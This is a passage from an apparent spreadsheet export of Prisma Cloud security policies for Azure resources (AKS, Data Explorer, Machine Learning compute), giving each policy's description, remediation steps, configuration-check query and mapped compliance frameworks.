          <t>Azure AKS cluster is not configured with disk encryption set</t>
        </is>
      </c>
      <c r="L2289" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2289" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2289" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2289" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2289" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2289" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2289" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2289" t="inlineStr"/>
      <c r="T2289" t="b">
        <v>0</v>
      </c>
      <c r="U2289" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2289" t="inlineStr">
        <is>
          <t>azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W2289" t="inlineStr">
        <is>
          <t>This policy identifies AKS clusters that are not configured with disk encryption set. Azure Key Vault Provider for Secrets Store CSI Driver allows for the integration of an Azure key vault as a secrets store with an Azure Kubernetes Service (AKS) cluster via a CSI volume. It is recommended to enable secret store CSI driver for your Kubernetes clusters.</t>
        </is>
      </c>
      <c r="X2289" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to Kubernetes services dashboard
3. Click on the reported Kubernetes cluster
4. Under Setting section, Click on 'Cluster configuration'
5. Select 'Enable secret store CSI driver'
NOTE: Once the CSI driver is enabled, Azure will deploy additional pods onto the cluster. You'll still need to configure Azure Key Vault, define secrets to securely fetch, and redeploy the application to use these secrets.
For more details: https://azure.github.io/secrets-store-csi-driver-provider-azure/docs/demos/standard-walkthrough/
6. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-disk-encryption-set
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-kubernetes-policies/ensure-that-aks-uses-disk-encryption-set</t>
        </is>
      </c>
      <c r="Y2289" t="inlineStr"/>
      <c r="Z2289" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-kubernetes-cluster' AND json.rule = properties.powerState.code equal ignore case Running and properties.addonProfiles.azureKeyvaultSecretsProvider.enabled is false
{"category":"Kubernetes","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA2289" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2289" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2289" t="inlineStr">
        <is>
          <t>PC-AZR-K8S-936-CKV_AZURE_117</t>
        </is>
      </c>
      <c r="AD2289" t="b">
        <v>1</v>
      </c>
      <c r="AE2289" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2289" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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89" t="inlineStr">
        <is>
          <t>2b3fa957-1875-4d35-b4b1-2355f04f6ab1</t>
        </is>
      </c>
      <c r="AI2289" t="inlineStr">
        <is>
          <t>4b83a6a2-c481-4e62-bc78-b45aa8712816</t>
        </is>
      </c>
      <c r="AJ2289" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2289" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2290">
      <c r="A2290" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CIS Controls v8.1, Copy of ACSC Information Security Manual (ISM)-clone, NIST 800-53 Rev 5, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, SOC 2, NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 1, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, SOC 2, CSA CCM v.4.0.1, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ITSG-33, HITRUST v.9.4.2 [Deprecated], GDPR, SOC 2, CIS Controls v8.1, ISO/IEC 27002:2013, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, ACSC Information Security Manual (ISM), TX-RAMP Level 2, Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B2290" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2290" s="2" t="inlineStr"/>
      <c r="D2290" t="inlineStr"/>
      <c r="E2290" t="inlineStr"/>
      <c r="F2290" t="inlineStr"/>
      <c r="G2290" t="b">
        <v>1</v>
      </c>
      <c r="H22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90" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2290" t="inlineStr">
        <is>
          <t>azure-aks</t>
        </is>
      </c>
      <c r="K2290" t="inlineStr">
        <is>
          <t>Azure AKS cluster Azure CNI networking not enabled</t>
        </is>
      </c>
      <c r="L2290" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2290" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2290" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2290" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2290" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2290" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2290" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2290" t="inlineStr"/>
      <c r="T2290" t="b">
        <v>0</v>
      </c>
      <c r="U2290" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2290" t="inlineStr">
        <is>
          <t>azure-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W2290" t="inlineStr">
        <is>
          <t>Azure CNI provides the following features over kubenet networking:
- Every pod in the cluster is assigned an IP address in the virtual network. The pods can directly communicate with other pods in the cluster, and other nodes in the virtual network.
- Pods in a subnet that have service endpoints enabled can securely connect to Azure services, such as Azure Storage and SQL DB.
- You can create user-defined routes (UDR) to route traffic from pods to a Network Virtual Appliance.
- Support for Network Policies securing communication between pods.
This policy checks your AKS cluster for the Azure CNI network plugin and generates an alert if not found.</t>
        </is>
      </c>
      <c r="X2290" t="inlineStr">
        <is>
          <t>To create a new AKS cluster with the Azure CNI network plugin enabled, follow the below URL:
https://learn.microsoft.com/en-us/azure/aks/configure-azure-cni 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-29
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-29</t>
        </is>
      </c>
      <c r="Y2290" t="inlineStr"/>
      <c r="Z2290" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-kubernetes-cluster' AND json.rule =  properties.networkProfile.networkPlugin does not contain azure
{"category":"General","resourceTypes":["azurerm_kubernetes_cluster"]}</t>
        </is>
      </c>
      <c r="AA2290" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2290" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2290" t="inlineStr">
        <is>
          <t>PC-AZR-K8S-393-CKV2_AZURE_29</t>
        </is>
      </c>
      <c r="AD2290" t="b">
        <v>1</v>
      </c>
      <c r="AE2290" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2290" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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90" t="inlineStr">
        <is>
          <t>ac313c08-1f79-4e55-96e4-49c20064bff0</t>
        </is>
      </c>
      <c r="AI2290" t="inlineStr">
        <is>
          <t>bc288480-0d31-4ccc-bc0e-3c4dc185f5a1</t>
        </is>
      </c>
      <c r="AJ2290" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2290" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2291">
      <c r="A2291" t="inlineStr"/>
      <c r="B2291" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2291" s="2" t="inlineStr"/>
      <c r="D2291" t="inlineStr"/>
      <c r="E2291" t="inlineStr"/>
      <c r="F2291" t="inlineStr"/>
      <c r="G2291" t="b">
        <v>0</v>
      </c>
      <c r="H22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91" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2291" t="inlineStr">
        <is>
          <t>azure-kusto-clusters</t>
        </is>
      </c>
      <c r="K2291" t="inlineStr">
        <is>
          <t>test_mbv501</t>
        </is>
      </c>
      <c r="L2291" t="inlineStr"/>
      <c r="M2291" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2291" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O2291" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2291" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2291" t="inlineStr"/>
      <c r="R2291" t="inlineStr"/>
      <c r="S2291" t="inlineStr">
        <is>
          <t>newtest</t>
        </is>
      </c>
      <c r="T2291" t="b">
        <v>0</v>
      </c>
      <c r="U2291" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2291" t="inlineStr">
        <is>
          <t>azure-kusto-clusters</t>
        </is>
      </c>
      <c r="W2291" t="inlineStr"/>
      <c r="X2291" t="inlineStr"/>
      <c r="Y2291" t="inlineStr"/>
      <c r="Z2291" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-kusto-clusters' AND json.rule = properties.state equal ignore case Running and properties.enableDiskEncryption is false</t>
        </is>
      </c>
      <c r="AA2291" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB2291" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2291" t="inlineStr"/>
      <c r="AD2291" t="b">
        <v>0</v>
      </c>
      <c r="AE2291" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF2291" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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91" t="inlineStr">
        <is>
          <t>895282d0-629e-4bf2-aed7-fc1632a4f827</t>
        </is>
      </c>
      <c r="AI2291" t="inlineStr">
        <is>
          <t>4894f56b-6d71-40c9-82f9-660266a23439</t>
        </is>
      </c>
      <c r="AJ2291" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2291" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2292">
      <c r="A2292" t="inlineStr">
        <is>
          <t>HIPAA, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Telecommunications Security Act - TSA, Telecommunications Security Act - TSA, Microsoft Cloud Security Benchmark v1, HIPAA, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2292" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2292" s="2" t="inlineStr"/>
      <c r="D2292" t="inlineStr"/>
      <c r="E2292" t="inlineStr"/>
      <c r="F2292" t="inlineStr"/>
      <c r="G2292" t="b">
        <v>1</v>
      </c>
      <c r="H22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92" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2292" t="inlineStr">
        <is>
          <t>azure-kusto-clusters</t>
        </is>
      </c>
      <c r="K2292" t="inlineStr">
        <is>
          <t>Azure Data Explorer cluster double encryption is disabled</t>
        </is>
      </c>
      <c r="L2292" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2292" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2292" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2292" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2292" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2292" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2292" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2292" t="inlineStr"/>
      <c r="T2292" t="b">
        <v>0</v>
      </c>
      <c r="U2292" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2292" t="inlineStr">
        <is>
          <t>azure-kusto-clusters</t>
        </is>
      </c>
      <c r="W2292" t="inlineStr">
        <is>
          <t>This policy identifies Azure Data Explorer clusters in which double encryption is disabled. Double encryption adds a second layer of encryption using service-managed keys. It is recommended to enable infrastructure double encryption on Data Explorer clusters so that encryption can be implemented at the layer closest to the storage device or network wires.
For more details: 
https://learn.microsoft.com/en-us/azure/data-explorer/cluster-encryption-double</t>
        </is>
      </c>
      <c r="X2292" t="inlineStr">
        <is>
          <t>Enabling double encryption is only possible during cluster creation. Once infrastructure encryption is enabled on your cluster, you can't disable it.
To create Azure Data Explorer cluster with double encryption, follow below URL:
https://learn.microsoft.com/en-us/azure/data-explorer/cluster-encryption-double
NOTE: Using Infrastructure double encryption will have performance impact on the Azure Database for PostgreSQL server due to the additional encryption process. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-double-encryption
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-double-encryption</t>
        </is>
      </c>
      <c r="Y2292" t="inlineStr"/>
      <c r="Z2292" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-kusto-clusters' AND json.rule = properties.state equal ignore case Running and properties.enableDoubleEncryption is false
{"category":"General","resourceTypes":["azurerm_kusto_cluster"]}</t>
        </is>
      </c>
      <c r="AA2292" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2292" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2292" t="inlineStr">
        <is>
          <t>PC-AZR-AKU-1045-CKV_AZURE_75</t>
        </is>
      </c>
      <c r="AD2292" t="b">
        <v>1</v>
      </c>
      <c r="AE2292" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2292" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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92" t="inlineStr">
        <is>
          <t>5baf83d2-8762-4269-aebd-5c3663652da0</t>
        </is>
      </c>
      <c r="AI2292" t="inlineStr">
        <is>
          <t>c55bf782-ea80-44f0-becc-7b50df873d8a</t>
        </is>
      </c>
      <c r="AJ2292" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2292" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2293">
      <c r="A2293" t="inlineStr">
        <is>
          <t>HIPAA, ISO/IEC 27001:2022, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, HIPAA, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2293" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2293" s="2" t="inlineStr"/>
      <c r="D2293" t="inlineStr"/>
      <c r="E2293" t="inlineStr"/>
      <c r="F2293" t="inlineStr"/>
      <c r="G2293" t="b">
        <v>1</v>
      </c>
      <c r="H22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293" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2293" t="inlineStr">
        <is>
          <t>azure-kusto-clusters</t>
        </is>
      </c>
      <c r="K2293" t="inlineStr">
        <is>
          <t>Azure Data Explorer cluster disk encryption is disabled</t>
        </is>
      </c>
      <c r="L2293" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2293" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2293" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2293" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2293" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2293" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2293" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2293" t="inlineStr"/>
      <c r="T2293" t="b">
        <v>0</v>
      </c>
      <c r="U2293" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2293" t="inlineStr">
        <is>
          <t>azure-kusto-clusters</t>
        </is>
      </c>
      <c r="W2293" t="inlineStr">
        <is>
          <t>This policy identifies Azure Data Explorer clusters in which disk encryption is disabled. Enabling encryption at rest on your cluster provides data protection for stored data. It is recommended to enable disk encryption on Data Explorer clusters.
For more details: 
https://learn.microsoft.com/en-us/azure/data-explorer/cluster-encryption-disk</t>
        </is>
      </c>
      <c r="X2293" t="inlineStr">
        <is>
          <t>To configure Disk encryption on existing Data Explorer cluster, follow below URL:
https://learn.microsoft.com/en-us/azure/data-explorer/cluster-encryption-disk 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-disk-encryption
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-data-explorer-uses-disk-encryption</t>
        </is>
      </c>
      <c r="Y2293" t="inlineStr"/>
      <c r="Z2293" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-kusto-clusters' AND json.rule = properties.state equal ignore case Running and properties.enableDiskEncryption is false
{"category":"General","resourceTypes":["azurerm_kusto_cluster"]}</t>
        </is>
      </c>
      <c r="AA2293" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2293" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2293" t="inlineStr">
        <is>
          <t>PC-AZR-AKU-1046-CKV_AZURE_74</t>
        </is>
      </c>
      <c r="AD2293" t="b">
        <v>1</v>
      </c>
      <c r="AE2293" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2293" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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293" t="inlineStr">
        <is>
          <t>dcdc7713-2f14-447b-a8ce-9fe991e1a71c</t>
        </is>
      </c>
      <c r="AI2293" t="inlineStr">
        <is>
          <t>4894f56b-6d71-40c9-82f9-660266a23439</t>
        </is>
      </c>
      <c r="AJ2293" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2293" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2294">
      <c r="A2294" t="inlineStr">
        <is>
          <t>TX-RAMP Level 1</t>
        </is>
      </c>
      <c r="B2294" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2294" s="2" t="inlineStr"/>
      <c r="D2294" t="inlineStr"/>
      <c r="E2294" t="inlineStr"/>
      <c r="F2294" t="inlineStr"/>
      <c r="G2294" t="b">
        <v>1</v>
      </c>
      <c r="H22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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2294" t="inlineStr">
        <is>
          <t>azure-machine-learning</t>
        </is>
      </c>
      <c r="K2294" t="inlineStr">
        <is>
          <t>Azure Machine Learning compute instance not running latest OS Image Version</t>
        </is>
      </c>
      <c r="L2294" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2294" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2294" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2294" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2294" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2294" t="inlineStr">
        <is>
          <t>CM</t>
        </is>
      </c>
      <c r="R2294" t="inlineStr">
        <is>
          <t>CM-10-00 : Software Usage Restrictions</t>
        </is>
      </c>
      <c r="S2294" t="inlineStr"/>
      <c r="T2294" t="b">
        <v>0</v>
      </c>
      <c r="U2294" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2294" t="inlineStr">
        <is>
          <t>azure-machine-learning-compute</t>
        </is>
      </c>
      <c r="W2294" t="inlineStr">
        <is>
          <t>This policy identifies Azure Machine Learning compute instances not running on the latest available image version.
Running compute instances on outdated image versions increases security risks. Without the latest security patches and updates, these instances are more vulnerable to attacks, which can compromise machine learning models and data.
As a best practice, it is recommended to recreate or update Azure Machine Learning compute instances to the latest image version, ensuring they have the most recent security patches and updates.</t>
        </is>
      </c>
      <c r="X2294" t="inlineStr">
        <is>
          <t>To ensure your Azure Machine Learning compute instances are running the latest available image version, follow these remediation steps:
1. Recreate the Compute Instance. This will ensure it is provisioned with the latest VM image, including all recent updates and security patches.
- Steps:
  1. Backup Important Data:
     - Store notebooks in the `User files` directory to persist them.
     - Mount data to persist files.
  2. Re-create the Instance:
     - Delete the existing compute instance.
     - Provision a new compute instance with latest OS image version.
  3. Restore Data:
     - Restore notebooks and mounted data to the newly created instance.
Note: This will result in the loss of data and customizations stored on the instance's OS and temporary disks.</t>
        </is>
      </c>
      <c r="Y2294" t="inlineStr"/>
      <c r="Z2294" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-machine-learning-compute' AND json.rule = properties.provisioningState equal ignore case "Succeeded" and properties.properties.state equal ignore case "Running" and properties.properties.osImageMetadata.isLatestOsImageVersion is false</t>
        </is>
      </c>
      <c r="AA2294" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2294" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2294" t="inlineStr">
        <is>
          <t>PC-AZR-AML-1254</t>
        </is>
      </c>
      <c r="AD2294" t="b">
        <v>1</v>
      </c>
      <c r="AE2294" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2294" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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4" t="inlineStr">
        <is>
          <t>ef818e3b-5eb4-4066-9393-aefe4eff34f6</t>
        </is>
      </c>
      <c r="AI2294" t="inlineStr">
        <is>
          <t>7a7faf2f-1351-4686-8235-99b62c68b6ad</t>
        </is>
      </c>
      <c r="AJ2294" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2294" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2295">
      <c r="A2295" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India</t>
        </is>
      </c>
      <c r="B2295" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2295" s="2" t="inlineStr"/>
      <c r="D2295" t="inlineStr"/>
      <c r="E2295" t="inlineStr"/>
      <c r="F2295" t="inlineStr"/>
      <c r="G2295" t="b">
        <v>1</v>
      </c>
      <c r="H22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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2295" t="inlineStr">
        <is>
          <t>azure-machine-learning</t>
        </is>
      </c>
      <c r="K2295" t="inlineStr">
        <is>
          <t>Azure Machine Learning compute instance not configured inside virtual network</t>
        </is>
      </c>
      <c r="L2295" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2295" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2295" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2295" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2295" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2295" t="inlineStr">
        <is>
          <t>Security Domain Policies</t>
        </is>
      </c>
      <c r="R2295" t="inlineStr">
        <is>
          <t>Network Security</t>
        </is>
      </c>
      <c r="S2295" t="inlineStr"/>
      <c r="T2295" t="b">
        <v>0</v>
      </c>
      <c r="U2295" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2295" t="inlineStr">
        <is>
          <t>azure-machine-learning-compute</t>
        </is>
      </c>
      <c r="W2295" t="inlineStr">
        <is>
          <t>This policy identifies Azure Machine Learning compute instances that are not configured within a virtual network.
Azure Machine Learning compute instances outside a Virtual Network are exposed to external threats, as they may be publicly accessible. Placing the instance within a Virtual Network improves security by limiting access to trusted virtual machines and services within the same network. This ensures secure communication and blocks unauthorized public access.
As a security best practice, it is recommended to deploy the Azure Machine Learning compute instances inside a virtual network.</t>
        </is>
      </c>
      <c r="X2295" t="inlineStr">
        <is>
          <t>Note: Configuring an existing Azure Machine Learning compute instance inside a Virtual Network without deleting and recreating it is not supported. To ensure security, it is recommended to set up the compute instance within a Virtual Network from the start.
To create a new compute instance inside a Virtual Network:
1. Log in to Azure Portal and search for 'Azure Machine Learning'
2. Select 'Azure Machine Learning'
3. Select the Azure Machine Learning Workspace that the reported compute instance is associated with
4. On the 'Overview' page, click the 'Studio web URL' link to log in to Azure ML Studio
5. A new tab will open for Azure ML Studio
6. In the left panel, under 'Manage' section, click on the 'Compute'
7. Click 'New' to create a new compute instance
8. In the 'Security' tab, under the 'Virtual network' section, enable the 'Enable virtual network' to configure it within a Virtual network
9. Select 'Review + Create' to create the compute instance</t>
        </is>
      </c>
      <c r="Y2295" t="inlineStr"/>
      <c r="Z2295" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-machine-learning-compute' AND json.rule = properties.provisioningState equal ignore case Succeeded and properties.properties.subnet.id does not exist</t>
        </is>
      </c>
      <c r="AA2295" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2295" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2295" t="inlineStr">
        <is>
          <t>PC-AZR-AML-1294</t>
        </is>
      </c>
      <c r="AD2295" t="b">
        <v>1</v>
      </c>
      <c r="AE2295" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2295" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG22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5" t="inlineStr">
        <is>
          <t>a4ba9749-82c7-4d7b-ba37-e0ba77bb8b1a</t>
        </is>
      </c>
      <c r="AI2295" t="inlineStr">
        <is>
          <t>46159688-71db-4e96-b7af-d15a403bc2da</t>
        </is>
      </c>
      <c r="AJ2295" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2295" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2296">
      <c r="A2296" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India</t>
        </is>
      </c>
      <c r="B2296" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2296" s="2" t="inlineStr"/>
      <c r="D2296" t="inlineStr"/>
      <c r="E2296" t="inlineStr"/>
      <c r="F2296" t="inlineStr"/>
      <c r="G2296" t="b">
        <v>1</v>
      </c>
      <c r="H22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6" t="inlineStr">
        <is>
